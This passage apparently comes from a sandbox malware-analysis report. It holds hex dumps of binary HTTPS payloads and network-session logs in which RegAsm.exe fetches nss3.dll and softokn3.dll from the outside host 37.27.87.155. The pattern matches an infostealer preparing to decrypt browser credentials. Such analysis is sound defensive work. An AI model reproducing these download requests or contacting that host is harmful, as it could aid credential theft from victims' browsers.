                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                                                                                                                Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                                                                                                                Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                                                                                                                Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                                                                                                                Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                                                                                                                Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                                                                                Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                                                                                Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:19 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                                                                                Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                14192.168.2.44974937.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:20 UTC153OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:20 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                Content-Length: 2046288
                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                                                                                                                Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                                                                                                                                                                                                                                Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                                                                                                                Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                                                                                                                                                                                                                                Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                                                                                                                                                                                                                                Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                                                                                                                                                                                                                                Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                                                                                                                                                                                                                                Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                                                                                                                                                                                                                                Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:21 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                                                                                                                                                                                                                                Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                15192.168.2.44975037.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:23 UTC157OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:23 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:23 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                Content-Length: 257872
                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ETag: "6315a9f4-3ef50"
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
